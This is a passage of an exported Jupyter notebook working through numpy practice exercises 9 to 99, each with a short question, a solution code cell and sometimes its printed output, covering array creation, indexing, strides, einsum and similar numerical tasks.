[49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26
25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2
1 0]
###Markdown
9. Create a 3x3 matrix with values ranging from 0 to 8 (★☆☆)
###Code
Z = np.arange(9).reshape(3,3)
print(Z)
###Output
[[0 1 2]
[3 4 5]
[6 7 8]]
###Markdown
10. Find indices of non-zero elements from \[1,2,0,0,4,0\] (★☆☆)
###Code
nz = np.nonzero([1,2,0,0,4,0])
print(nz)
###Output
(array([0, 1, 4]),)
###Markdown
11. Create a 3x3 identity matrix (★☆☆)
###Code
Z = np.eye(3)
print(Z)
###Output
[[1. 0. 0.]
[0. 1. 0.]
[0. 0. 1.]]
###Markdown
12. Create a 3x3x3 array with random values (★☆☆)
###Code
Z = np.random.random((3,3,3))
print(Z)
###Output
[[[0.53538205 0.89826967 0.52429946]
[0.5224464 0.43697246 0.46813808]
[0.41888029 0.00380832 0.90120746]]
[[0.8183299 0.6864285 0.22187739]
[0.499926 0.01759788 0.20627718]
[0.86462224 0.30962975 0.96285294]]
[[0.36556949 0.33610718 0.86920154]
[0.88025697 0.9917684 0.12386331]
[0.99962136 0.51710727 0.17636221]]]
###Markdown
13. Create a 10x10 array with random values and find the minimum and maximum values (★☆☆)
###Code
Z = np.random.random((10,10))
Zmin, Zmax = Z.min(), Z.max()
print(Zmin, Zmax)
###Output
(0.0024024835938185607, 0.9955171333482343)
###Markdown
14. Create a random vector of size 30 and find the mean value (★☆☆)
###Code
Z = np.random.random(30)
m = Z.mean()
print(Z)
print(m)
###Output
[0.95441691 0.74087704 0.7412656 0.00572944 0.66722554 0.70236887
0.07954851 0.06672898 0.53048422 0.40783689 0.846075 0.09090283
0.63068998 0.23041961 0.86174037 0.67322445 0.78001924 0.41436689
0.0867322 0.97043283 0.65383273 0.68087747 0.98077876 0.38868797
0.05757929 0.92593766 0.77028409 0.06129894 0.25854888 0.77283708]
0.5343916083058214
###Markdown
15. Create a 2d array with 1 on the border and 0 inside (★☆☆)
###Code
Z = np.ones((10,10))
Z[1:-1,1:-1] = 0
print(Z)
###Output
[[1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]]
###Markdown
16. How to add a border (filled with 0's) around an existing array? (★☆☆)
###Code
Z = np.ones((5,5))
Z = np.pad(Z, pad_width=1, mode='constant', constant_values=0)
print(Z)
###Output
[[0. 0. 0. 0. 0. 0. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 0. 0. 0. 0. 0. 0.]]
###Markdown
17. What is the result of the following expression? (★☆☆)
###Code
print(0 * np.nan)
print(np.nan == np.nan)
print(np.inf > np.nan)
print(np.nan - np.nan)
print(0.3 == 3 * 0.1)
###Output
nan
False
False
nan
False
###Markdown
18. Create a 5x5 matrix with values 1,2,3,4 just below the diagonal (★☆☆)
###Code
Z = np.diag(1+np.arange(4),k=-1)
print(Z)
###Output
[[0 0 0 0 0]
[1 0 0 0 0]
[0 2 0 0 0]
[0 0 3 0 0]
[0 0 0 4 0]]
###Markdown
19. Create a 8x8 matrix and fill it with a checkerboard pattern (★☆☆)
###Code
Z = np.zeros((8,8),dtype=int)
Z[1::2,::2] = 1
Z[::2,1::2] = 2
print(Z)
###Output
[[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]
[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]
[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]
[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]]
###Markdown
20. Consider a (6,7,8) shape array, what is the index (x,y,z) of the 100th element?
###Code
print(np.unravel_index(100,(6,7,8)))
###Output
(1, 5, 4)
###Markdown
21. Create a checkerboard 8x8 matrix using the tile function (★☆☆)
###Code
Z = np.tile( np.array([[0,1],[1,0]]), (4,4))
print(Z)
###Output
[[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]
[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]
[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]
[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]]
###Markdown
22. Normalize a 5x5 random matrix (★☆☆)
###Code
Z = np.random.random((5,5))
Zmax, Zmin = Z.max(), Z.min()
Z = (Z - Zmin)/(Zmax - Zmin)
print(Z)
###Output
[[0.18452857 0.76344432 1. 0.65831803 0.37058484]
[0. 0.90348196 0.88659306 0.4483884 0.39140004]
[0.36680489 0.58821671 0.8384351 0.3455739 0.37715739]
[0.34925911 0.17920659 0.30043554 0.19351988 0.22912706]
[0.20359098 0.10572 0.74160808 0.82760094 0.6004225 ]]
###Markdown
23. Create a custom dtype that describes a color as four unsigned bytes (RGBA) (★☆☆)
###Code
color = np.dtype([("r", np.ubyte, 1),
("g", np.ubyte, 1),
("b", np.ubyte, 1),
("a", np.ubyte, 1)])
###Output
_____no_output_____
###Markdown
24. Multiply a 5x3 matrix by a 3x2 matrix (real matrix product) (★☆☆)
###Code
Z = np.dot(np.ones((5,3)), np.ones((3,2)))
print(Z)
# Alternative solution, in Python 3.5 and above
#Z = np.ones((5,3)) @ np.ones((3,2))
###Output
[[3. 3.]
[3. 3.]
[3. 3.]
[3. 3.]
[3. 3.]]
###Markdown
25. Given a 1D array, negate all elements which are between 3 and 8, in place. (★☆☆)
###Code
# Author: Evgeni Burovski
Z = np.arange(11)
Z[(3 < Z) & (Z <= 8)] *= -1
print(Z)
###Output
[ 0 1 2 3 -4 -5 -6 -7 -8 9 10]
###Markdown
26. What is the output of the following script? (★☆☆)
###Code
# Author: Jake VanderPlas
print(sum(range(5),-1))
from numpy import *
print(sum(range(5),-1))
###Output
_____no_output_____
###Markdown
27. Consider an integer vector Z, which of these expressions are legal? (★☆☆)
###Code
Z**Z
2 << Z >> 2
Z <- Z
1j*Z
Z/1/1
Z<Z>Z
###Output
_____no_output_____
###Markdown
28. What are the result of the following expressions?
###Code
print(np.array(0) / np.array(0))
print(np.array(0) // np.array(0))
print(np.array([np.nan]).astype(int).astype(float))
###Output
_____no_output_____
###Markdown
29. How to round away from zero a float array ? (★☆☆)
###Code
# Author: Charles R Harris
Z = np.random.uniform(-10,+10,10)
print (np.copysign(np.ceil(np.abs(Z)), Z))
###Output
_____no_output_____
###Markdown
30. How to find common values between two arrays? (★☆☆)
###Code
Z1 = np.random.randint(0,10,10)
Z2 = np.random.randint(0,10,10)
print(np.intersect1d(Z1,Z2))
###Output
_____no_output_____
###Markdown
31. How to ignore all numpy warnings (not recommended)? (★☆☆)
###Code
# Suicide mode on
defaults = np.seterr(all="ignore")
Z = np.ones(1) / 0
# Back to sanity
_ = np.seterr(**defaults)
An equivalent way, with a context manager:
with np.errstate(divide='ignore'):
Z = np.ones(1) / 0
###Output
_____no_output_____
###Markdown
32. Is the following expressions true? (★☆☆)
###Code
np.sqrt(-1) == np.emath.sqrt(-1)
###Output
_____no_output_____
###Markdown
33. How to get the dates of yesterday, today and tomorrow? (★☆☆)
###Code
yesterday = np.datetime64('today', 'D') - np.timedelta64(1, 'D')
today = np.datetime64('today', 'D')
tomorrow = np.datetime64('today', 'D') + np.timedelta64(1, 'D')
###Output
_____no_output_____
###Markdown
34. How to get all the dates corresponding to the month of July 2016? (★★☆)
###Code
Z = np.arange('2016-07', '2016-08', dtype='datetime64[D]')
print(Z)
###Output
_____no_output_____
###Markdown
35. How to compute ((A+B)\*(-A/2)) in place (without copy)? (★★☆)
###Code
A = np.ones(3)*1
B = np.ones(3)*2
C = np.ones(3)*3
np.add(A,B,out=B)
np.divide(A,2,out=A)
np.negative(A,out=A)
np.multiply(A,B,out=A)
###Output
_____no_output_____
###Markdown
36. Extract the integer part of a random array using 5 different methods (★★☆)
###Code
Z = np.random.uniform(0,10,10)
print (Z - Z%1)
print (np.floor(Z))
print (np.ceil(Z)-1)
print (Z.astype(int))
print (np.trunc(Z))
###Output
_____no_output_____
###Markdown
37. Create a 5x5 matrix with row values ranging from 0 to 4 (★★☆)
###Code
Z = np.zeros((5,5))
Z += np.arange(5)
print(Z)
###Output
_____no_output_____
###Markdown
38. Consider a generator function that generates 10 integers and use it to build an array (★☆☆)
###Code
def generate():
for x in range(10):
yield x
Z = np.fromiter(generate(),dtype=float,count=-1)
print(Z)
###Output
_____no_output_____
###Markdown
39. Create a vector of size 10 with values ranging from 0 to 1, both excluded (★★☆)
###Code
Z = np.linspace(0,1,11,endpoint=False)[1:]
print(Z)
###Output
_____no_output_____
###Markdown
40. Create a random vector of size 10 and sort it (★★☆)
###Code
Z = np.random.random(10)
Z.sort()
print(Z)
###Output
_____no_output_____
###Markdown
41. How to sum a small array faster than np.sum? (★★☆)
###Code
# Author: Evgeni Burovski
Z = np.arange(10)
np.add.reduce(Z)
###Output
_____no_output_____
###Markdown
42. Consider two random array A and B, check if they are equal (★★☆)
###Code
A = np.random.randint(0,2,5)
B = np.random.randint(0,2,5)
# Assuming identical shape of the arrays and a tolerance for the comparison of values
equal = np.allclose(A,B)
print(equal)
# Checking both the shape and the element values, no tolerance (values have to be exactly equal)
equal = np.array_equal(A,B)
print(equal)
###Output
_____no_output_____
###Markdown
43. Make an array immutable (read-only) (★★☆)
###Code
Z = np.zeros(10)
Z.flags.writeable = False
Z[0] = 1
###Output
_____no_output_____
###Markdown
44. Consider a random 10x2 matrix representing cartesian coordinates, convert them to polar coordinates (★★☆)
###Code
Z = np.random.random((10,2))
X,Y = Z[:,0], Z[:,1]
R = np.sqrt(X**2+Y**2)
T = np.arctan2(Y,X)
print(R)
print(T)
###Output
_____no_output_____
###Markdown
45. Create random vector of size 10 and replace the maximum value by 0 (★★☆)
###Code
Z = np.random.random(10)
Z[Z.argmax()] = 0
print(Z)
###Output
_____no_output_____
###Markdown
46. Create a structured array with `x` and `y` coordinates covering the \[0,1\]x\[0,1\] area (★★☆)
###Code
Z = np.zeros((5,5), [('x',float),('y',float)])
Z['x'], Z['y'] = np.meshgrid(np.linspace(0,1,5),
np.linspace(0,1,5))
print(Z)
###Output
_____no_output_____
###Markdown
47. Given two arrays, X and Y, construct the Cauchy matrix C (Cij =1/(xi - yj))
###Code
# Author: Evgeni Burovski
X = np.arange(8)
Y = X + 0.5
C = 1.0 / np.subtract.outer(X, Y)
print(np.linalg.det(C))
###Output
_____no_output_____
###Markdown
48. Print the minimum and maximum representable value for each numpy scalar type (★★☆)
###Code
for dtype in [np.int8, np.int32, np.int64]:
print(np.iinfo(dtype).min)
print(np.iinfo(dtype).max)
for dtype in [np.float32, np.float64]:
print(np.finfo(dtype).min)
print(np.finfo(dtype).max)
print(np.finfo(dtype).eps)
###Output
_____no_output_____
###Markdown
49. How to print all the values of an array? (★★☆)
###Code
np.set_printoptions(threshold=np.nan)
Z = np.zeros((16,16))
print(Z)
###Output
_____no_output_____
###Markdown
50. How to find the closest value (to a given scalar) in a vector? (★★☆)
###Code
Z = np.arange(100)
v = np.random.uniform(0,100)
index = (np.abs(Z-v)).argmin()
print(Z[index])
###Output
_____no_output_____
###Markdown
51. Create a structured array representing a position (x,y) and a color (r,g,b) (★★☆)
###Code
Z = np.zeros(10, [ ('position', [ ('x', float, 1),
('y', float, 1)]),
('color', [ ('r', float, 1),
('g', float, 1),
('b', float, 1)])])
print(Z)
###Output
_____no_output_____
###Markdown
52. Consider a random vector with shape (100,2) representing coordinates, find point by point distances (★★☆)
###Code
Z = np.random.random((10,2))
X,Y = np.atleast_2d(Z[:,0], Z[:,1])
D = np.sqrt( (X-X.T)**2 + (Y-Y.T)**2)
print(D)
# Much faster with scipy
import scipy
# Thanks Gavin Heverly-Coulson (#issue 1)
import scipy.spatial
Z = np.random.random((10,2))
D = scipy.spatial.distance.cdist(Z,Z)
print(D)
###Output
_____no_output_____
###Markdown
53. How to convert a float (32 bits) array into an integer (32 bits) in place?
###Code
Z = np.arange(10, dtype=np.int32)
Z = Z.astype(np.float32, copy=False)
print(Z)
###Output
_____no_output_____
###Markdown
54. How to read the following file? (★★☆)
###Code
from io import StringIO
# Fake file
s = StringIO("""1, 2, 3, 4, 5\n
6, , , 7, 8\n
, , 9,10,11\n""")
Z = np.genfromtxt(s, delimiter=",", dtype=np.int)
print(Z)
###Output
_____no_output_____
###Markdown
55. What is the equivalent of enumerate for numpy arrays? (★★☆)
###Code
Z = np.arange(9).reshape(3,3)
for index, value in np.ndenumerate(Z):
print(index, value)
for index in np.ndindex(Z.shape):
print(index, Z[index])
###Output
_____no_output_____
###Markdown
56. Generate a generic 2D Gaussian-like array (★★☆)
###Code
X, Y = np.meshgrid(np.linspace(-1,1,10), np.linspace(-1,1,10))
D = np.sqrt(X*X+Y*Y)
sigma, mu = 1.0, 0.0
G = np.exp(-( (D-mu)**2 / ( 2.0 * sigma**2 ) ) )
print(G)
###Output
_____no_output_____
###Markdown
57. How to randomly place p elements in a 2D array? (★★☆)
###Code
# Author: Divakar
n = 10
p = 3
Z = np.zeros((n,n))
np.put(Z, np.random.choice(range(n*n), p, replace=False),1)
print(Z)
###Output
_____no_output_____
###Markdown
58. Subtract the mean of each row of a matrix (★★☆)
###Code
# Author: Warren Weckesser
X = np.random.rand(5, 10)
# Recent versions of numpy
Y = X - X.mean(axis=1, keepdims=True)
# Older versions of numpy
Y = X - X.mean(axis=1).reshape(-1, 1)
print(Y)
###Output
_____no_output_____
###Markdown
59. How to sort an array by the nth column? (★★☆)
###Code
# Author: Steve Tjoa
Z = np.random.randint(0,10,(3,3))
print(Z)
print(Z[Z[:,1].argsort()])
###Output
_____no_output_____
###Markdown
60. How to tell if a given 2D array has null columns? (★★☆)
###Code
# Author: Warren Weckesser
Z = np.random.randint(0,3,(3,10))
print((~Z.any(axis=0)).any())
###Output
_____no_output_____
###Markdown
61. Find the nearest value from a given value in an array (★★☆)
###Code
Z = np.random.uniform(0,1,10)
z = 0.5
m = Z.flat[np.abs(Z - z).argmin()]
print(m)
###Output
_____no_output_____
###Markdown
62. Considering two arrays with shape (1,3) and (3,1), how to compute their sum using an iterator? (★★☆)
###Code
A = np.arange(3).reshape(3,1)
B = np.arange(3).reshape(1,3)
it = np.nditer([A,B,None])
for x,y,z in it: z[...] = x + y
print(it.operands[2])
###Output
_____no_output_____
###Markdown
63. Create an array class that has a name attribute (★★☆)
###Code
class NamedArray(np.ndarray):
def __new__(cls, array, name="no name"):
obj = np.asarray(array).view(cls)
obj.name = name
return obj
def __array_finalize__(self, obj):
if obj is None: return
self.info = getattr(obj, 'name', "no name")
Z = NamedArray(np.arange(10), "range_10")
print (Z.name)
###Output
_____no_output_____
###Markdown
64. Consider a given vector, how to add 1 to each element indexed by a second vector (be careful with repeated indices)? (★★★)
###Code
# Author: Brett Olsen
Z = np.ones(10)
I = np.random.randint(0,len(Z),20)
Z += np.bincount(I, minlength=len(Z))
print(Z)
# Another solution
# Author: Bartosz Telenczuk
np.add.at(Z, I, 1)
print(Z)
###Output
_____no_output_____
###Markdown
65. How to accumulate elements of a vector (X) to an array (F) based on an index list (I)? (★★★)
###Code
# Author: Alan G Isaac
X = [1,2,3,4,5,6]
I = [1,3,9,3,4,1]
F = np.bincount(I,X)
print(F)
###Output
_____no_output_____
###Markdown
66. Considering a (w,h,3) image of (dtype=ubyte), compute the number of unique colors (★★★)
###Code
# Author: Nadav Horesh
w,h = 16,16
I = np.random.randint(0,2,(h,w,3)).astype(np.ubyte)
#Note that we should compute 256*256 first.
#Otherwise numpy will only promote F.dtype to 'uint16' and overfolw will occur
F = I[...,0]*(256*256) + I[...,1]*256 +I[...,2]
n = len(np.unique(F))
print(n)
###Output
_____no_output_____
###Markdown
67. Considering a four dimensions array, how to get sum over the last two axis at once? (★★★)
###Code
A = np.random.randint(0,10,(3,4,3,4))
# solution by passing a tuple of axes (introduced in numpy 1.7.0)
sum = A.sum(axis=(-2,-1))
print(sum)
# solution by flattening the last two dimensions into one
# (useful for functions that don't accept tuples for axis argument)
sum = A.reshape(A.shape[:-2] + (-1,)).sum(axis=-1)
print(sum)
###Output
_____no_output_____
###Markdown
68. Considering a one-dimensional vector D, how to compute means of subsets of D using a vector S of same size describing subset indices? (★★★)
###Code
# Author: Jaime Fernández del Río
D = np.random.uniform(0,1,100)
S = np.random.randint(0,10,100)
D_sums = np.bincount(S, weights=D)
D_counts = np.bincount(S)
D_means = D_sums / D_counts
print(D_means)
# Pandas solution as a reference due to more intuitive code
import pandas as pd
print(pd.Series(D).groupby(S).mean())
###Output
_____no_output_____
###Markdown
69. How to get the diagonal of a dot product? (★★★)
###Code
# Author: Mathieu Blondel
A = np.random.uniform(0,1,(5,5))
B = np.random.uniform(0,1,(5,5))
# Slow version
np.diag(np.dot(A, B))
# Fast version
np.sum(A * B.T, axis=1)
# Faster version
np.einsum("ij,ji->i", A, B)
###Output
_____no_output_____
###Markdown
70. Consider the vector \[1, 2, 3, 4, 5\], how to build a new vector with 3 consecutive zeros interleaved between each value? (★★★)
###Code
# Author: Warren Weckesser
Z = np.array([1,2,3,4,5])
nz = 3
Z0 = np.zeros(len(Z) + (len(Z)-1)*(nz))
Z0[::nz+1] = Z
print(Z0)
###Output
_____no_output_____
###Markdown
71. Consider an array of dimension (5,5,3), how to mulitply it by an array with dimensions (5,5)? (★★★)
###Code
A = np.ones((5,5,3))
B = 2*np.ones((5,5))
print(A * B[:,:,None])
###Output
_____no_output_____
###Markdown
72. How to swap two rows of an array? (★★★)
###Code
# Author: Eelco Hoogendoorn
A = np.arange(25).reshape(5,5)
A[[0,1]] = A[[1,0]]
print(A)
###Output
_____no_output_____
###Markdown
73. Consider a set of 10 triplets describing 10 triangles (with shared vertices), find the set of unique line segments composing all the triangles (★★★)
###Code
# Author: Nicolas P. Rougier
faces = np.random.randint(0,100,(10,3))
F = np.roll(faces.repeat(2,axis=1),-1,axis=1)
F = F.reshape(len(F)*3,2)
F = np.sort(F,axis=1)
G = F.view( dtype=[('p0',F.dtype),('p1',F.dtype)] )
G = np.unique(G)
print(G)
###Output
_____no_output_____
###Markdown
74. Given an array C that is a bincount, how to produce an array A such that np.bincount(A) == C? (★★★)
###Code
# Author: Jaime Fernández del Río
C = np.bincount([1,1,2,3,4,4,6])
A = np.repeat(np.arange(len(C)), C)
print(A)
###Output
_____no_output_____
###Markdown
75. How to compute averages using a sliding window over an array? (★★★)
###Code
# Author: Jaime Fernández del Río
def moving_average(a, n=3) :
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
Z = np.arange(20)
print(moving_average(Z, n=3))
###Output
_____no_output_____
###Markdown
76. Consider a one-dimensional array Z, build a two-dimensional array whose first row is (Z\[0\],Z\[1\],Z\[2\]) and each subsequent row is shifted by 1 (last row should be (Z\[-3\],Z\[-2\],Z\[-1\]) (★★★)
###Code
# Author: Joe Kington / Erik Rigtorp
from numpy.lib import stride_tricks
def rolling(a, window):
shape = (a.size - window + 1, window)
strides = (a.itemsize, a.itemsize)
return stride_tricks.as_strided(a, shape=shape, strides=strides)
Z = rolling(np.arange(10), 3)
print(Z)
###Output
_____no_output_____
###Markdown
77. How to negate a boolean, or to change the sign of a float inplace? (★★★)
###Code
# Author: Nathaniel J. Smith
Z = np.random.randint(0,2,100)
np.logical_not(Z, out=Z)
Z = np.random.uniform(-1.0,1.0,100)
np.negative(Z, out=Z)
###Output
_____no_output_____
###Markdown
78. Consider 2 sets of points P0,P1 describing lines (2d) and a point p, how to compute distance from p to each line i (P0\[i\],P1\[i\])? (★★★)
###Code
def distance(P0, P1, p):
T = P1 - P0
L = (T**2).sum(axis=1)
U = -((P0[:,0]-p[...,0])*T[:,0] + (P0[:,1]-p[...,1])*T[:,1]) / L
U = U.reshape(len(U),1)
D = P0 + U*T - p
return np.sqrt((D**2).sum(axis=1))
P0 = np.random.uniform(-10,10,(10,2))
P1 = np.random.uniform(-10,10,(10,2))
p = np.random.uniform(-10,10,( 1,2))
print(distance(P0, P1, p))
###Output
_____no_output_____
###Markdown
79. Consider 2 sets of points P0,P1 describing lines (2d) and a set of points P, how to compute distance from each point j (P\[j\]) to each line i (P0\[i\],P1\[i\])? (★★★)
###Code
# Author: Italmassov Kuanysh
# based on distance function from previous question
P0 = np.random.uniform(-10, 10, (10,2))
P1 = np.random.uniform(-10,10,(10,2))
p = np.random.uniform(-10, 10, (10,2))
print(np.array([distance(P0,P1,p_i) for p_i in p]))
###Output
_____no_output_____
###Markdown
80. Consider an arbitrary array, write a function that extract a subpart with a fixed shape and centered on a given element (pad with a `fill` value when necessary) (★★★)
###Code
# Author: Nicolas Rougier
Z = np.random.randint(0,10,(10,10))
shape = (5,5)
fill = 0
position = (1,1)
R = np.ones(shape, dtype=Z.dtype)*fill
P = np.array(list(position)).astype(int)
Rs = np.array(list(R.shape)).astype(int)
Zs = np.array(list(Z.shape)).astype(int)
R_start = np.zeros((len(shape),)).astype(int)
R_stop = np.array(list(shape)).astype(int)
Z_start = (P-Rs//2)
Z_stop = (P+Rs//2)+Rs%2
R_start = (R_start - np.minimum(Z_start,0)).tolist()
Z_start = (np.maximum(Z_start,0)).tolist()
R_stop = np.maximum(R_start, (R_stop - np.maximum(Z_stop-Zs,0))).tolist()
Z_stop = (np.minimum(Z_stop,Zs)).tolist()
r = [slice(start,stop) for start,stop in zip(R_start,R_stop)]
z = [slice(start,stop) for start,stop in zip(Z_start,Z_stop)]
R[r] = Z[z]
print(Z)
print(R)
###Output
_____no_output_____
###Markdown
81. Consider an array Z = \[1,2,3,4,5,6,7,8,9,10,11,12,13,14\], how to generate an array R = \[\[1,2,3,4\], \[2,3,4,5\], \[3,4,5,6\], ..., \[11,12,13,14\]\]? (★★★)
###Code
# Author: Stefan van der Walt
Z = np.arange(1,15,dtype=np.uint32)
R = stride_tricks.as_strided(Z,(11,4),(4,4))
print(R)
###Output
_____no_output_____
###Markdown
82. Compute a matrix rank (★★★)
###Code
# Author: Stefan van der Walt
Z = np.random.uniform(0,1,(10,10))
U, S, V = np.linalg.svd(Z) # Singular Value Decomposition
rank = np.sum(S > 1e-10)
print(rank)
###Output
_____no_output_____
###Markdown
83. How to find the most frequent value in an array?
###Code
Z = np.random.randint(0,10,50)
print(np.bincount(Z).argmax())
###Output
_____no_output_____
###Markdown
84. Extract all the contiguous 3x3 blocks from a random 10x10 matrix (★★★)
###Code
# Author: Chris Barker
Z = np.random.randint(0,5,(10,10))
n = 3
i = 1 + (Z.shape[0]-3)
j = 1 + (Z.shape[1]-3)
C = stride_tricks.as_strided(Z, shape=(i, j, n, n), strides=Z.strides + Z.strides)
print(C)
###Output
_____no_output_____
###Markdown
85. Create a 2D array subclass such that Z\[i,j\] == Z\[j,i\] (★★★)
###Code
# Author: Eric O. Lebigot
# Note: only works for 2d array and value setting using indices
class Symetric(np.ndarray):
def __setitem__(self, index, value):
i,j = index
super(Symetric, self).__setitem__((i,j), value)
super(Symetric, self).__setitem__((j,i), value)
def symetric(Z):
return np.asarray(Z + Z.T - np.diag(Z.diagonal())).view(Symetric)
S = symetric(np.random.randint(0,10,(5,5)))
S[2,3] = 42
print(S)
###Output
_____no_output_____
###Markdown
86. Consider a set of p matrices wich shape (n,n) and a set of p vectors with shape (n,1). How to compute the sum of of the p matrix products at once? (result has shape (n,1)) (★★★)
###Code
# Author: Stefan van der Walt
p, n = 10, 20
M = np.ones((p,n,n))
V = np.ones((p,n,1))
S = np.tensordot(M, V, axes=[[0, 2], [0, 1]])
print(S)
# It works, because:
# M is (p,n,n)
# V is (p,n,1)
# Thus, summing over the paired axes 0 and 0 (of M and V independently),
# and 2 and 1, to remain with a (n,1) vector.
###Output
_____no_output_____
###Markdown
87. Consider a 16x16 array, how to get the block-sum (block size is 4x4)? (★★★)
###Code
# Author: Robert Kern
Z = np.ones((16,16))
k = 4
S = np.add.reduceat(np.add.reduceat(Z, np.arange(0, Z.shape[0], k), axis=0),
np.arange(0, Z.shape[1], k), axis=1)
print(S)
###Output
_____no_output_____
###Markdown
88. How to implement the Game of Life using numpy arrays? (★★★)
###Code
# Author: Nicolas Rougier
def iterate(Z):
# Count neighbours
N = (Z[0:-2,0:-2] + Z[0:-2,1:-1] + Z[0:-2,2:] +
Z[1:-1,0:-2] + Z[1:-1,2:] +
Z[2: ,0:-2] + Z[2: ,1:-1] + Z[2: ,2:])
# Apply rules
birth = (N==3) & (Z[1:-1,1:-1]==0)
survive = ((N==2) | (N==3)) & (Z[1:-1,1:-1]==1)
Z[...] = 0
Z[1:-1,1:-1][birth | survive] = 1
return Z
Z = np.random.randint(0,2,(50,50))
for i in range(100): Z = iterate(Z)
print(Z)
###Output
_____no_output_____
###Markdown
89. How to get the n largest values of an array (★★★)
###Code
Z = np.arange(10000)
np.random.shuffle(Z)
n = 5
# Slow
print (Z[np.argsort(Z)[-n:]])
# Fast
print (Z[np.argpartition(-Z,n)[:n]])
###Output
_____no_output_____
###Markdown
90. Given an arbitrary number of vectors, build the cartesian product (every combinations of every item) (★★★)
###Code
# Author: Stefan Van der Walt
def cartesian(arrays):
arrays = [np.asarray(a) for a in arrays]
shape = (len(x) for x in arrays)
ix = np.indices(shape, dtype=int)
ix = ix.reshape(len(arrays), -1).T
for n, arr in enumerate(arrays):
ix[:, n] = arrays[n][ix[:, n]]
return ix
print (cartesian(([1, 2, 3], [4, 5], [6, 7])))
###Output
_____no_output_____
###Markdown
91. How to create a record array from a regular array? (★★★)
###Code
Z = np.array([("Hello", 2.5, 3),
("World", 3.6, 2)])
R = np.core.records.fromarrays(Z.T,
names='col1, col2, col3',
formats = 'S8, f8, i8')
print(R)
###Output
_____no_output_____
###Markdown
92. Consider a large vector Z, compute Z to the power of 3 using 3 different methods (★★★)
###Code
# Author: Ryan G.
x = np.random.rand(5e7)
%timeit np.power(x,3)
%timeit x*x*x
%timeit np.einsum('i,i,i->i',x,x,x)
###Output
_____no_output_____
###Markdown
93. Consider two arrays A and B of shape (8,3) and (2,2). How to find rows of A that contain elements of each row of B regardless of the order of the elements in B? (★★★)
###Code
# Author: Gabe Schwartz
A = np.random.randint(0,5,(8,3))
B = np.random.randint(0,5,(2,2))
C = (A[..., np.newaxis, np.newaxis] == B)
rows = np.where(C.any((3,1)).all(1))[0]
print(rows)
###Output
_____no_output_____
###Markdown
94. Considering a 10x3 matrix, extract rows with unequal values (e.g. \[2,2,3\]) (★★★)
###Code
# Author: Robert Kern
Z = np.random.randint(0,5,(10,3))
print(Z)
# solution for arrays of all dtypes (including string arrays and record arrays)
E = np.all(Z[:,1:] == Z[:,:-1], axis=1)
U = Z[~E]
print(U)
# soluiton for numerical arrays only, will work for any number of columns in Z
U = Z[Z.max(axis=1) != Z.min(axis=1),:]
print(U)
###Output
_____no_output_____
###Markdown
95. Convert a vector of ints into a matrix binary representation (★★★)
###Code
# Author: Warren Weckesser
I = np.array([0, 1, 2, 3, 15, 16, 32, 64, 128])
B = ((I.reshape(-1,1) & (2**np.arange(8))) != 0).astype(int)
print(B[:,::-1])
# Author: Daniel T. McDonald
I = np.array([0, 1, 2, 3, 15, 16, 32, 64, 128], dtype=np.uint8)
print(np.unpackbits(I[:, np.newaxis], axis=1))
###Output
_____no_output_____
###Markdown
96. Given a two dimensional array, how to extract unique rows? (★★★)
###Code
# Author: Jaime Fernández del Río
Z = np.random.randint(0,2,(6,3))
T = np.ascontiguousarray(Z).view(np.dtype((np.void, Z.dtype.itemsize * Z.shape[1])))
_, idx = np.unique(T, return_index=True)
uZ = Z[idx]
print(uZ)
###Output
_____no_output_____
###Markdown
97. Considering 2 vectors A & B, write the einsum equivalent of inner, outer, sum, and mul function (★★★)
###Code
A = np.random.uniform(0,1,10)
B = np.random.uniform(0,1,10)
np.einsum('i->', A) # np.sum(A)
np.einsum('i,i->i', A, B) # A * B
np.einsum('i,i', A, B) # np.inner(A, B)
np.einsum('i,j->ij', A, B) # np.outer(A, B)
###Output
_____no_output_____
###Markdown
98. Considering a path described by two vectors (X,Y), how to sample it using equidistant samples (★★★)?
###Code
# Author: Bas Swinckels
phi = np.arange(0, 10*np.pi, 0.1)
a = 1
x = a*phi*np.cos(phi)
y = a*phi*np.sin(phi)
dr = (np.diff(x)**2 + np.diff(y)**2)**.5 # segment lengths
r = np.zeros_like(x)
r[1:] = np.cumsum(dr) # integrate path
r_int = np.linspace(0, r.max(), 200) # regular spaced path
x_int = np.interp(r_int, r, x) # integrate path
y_int = np.interp(r_int, r, y)
###Output
_____no_output_____
###Markdown
99. Given an integer n and a 2D array X, select from X the rows which can be interpreted as draws from a multinomial distribution with n degrees, i.e., the rows which only contain integers and which sum to n. (★★★)
###Code
# Author: Evgeni Burovski
X = np.asarray([[1.0, 0.0, 3.0, 8.0],
[2.0, 0.0, 1.0, 1.0],
[1.5, 2.5, 1.0, 0.0]])
n = 4
M = np.logical_and.reduce(np.mod(X, 1) == 0, axis=-1)
M &= (X.sum(axis=-1) == n)
print(X[M])
###Output
_____no_output_____
###Markdown
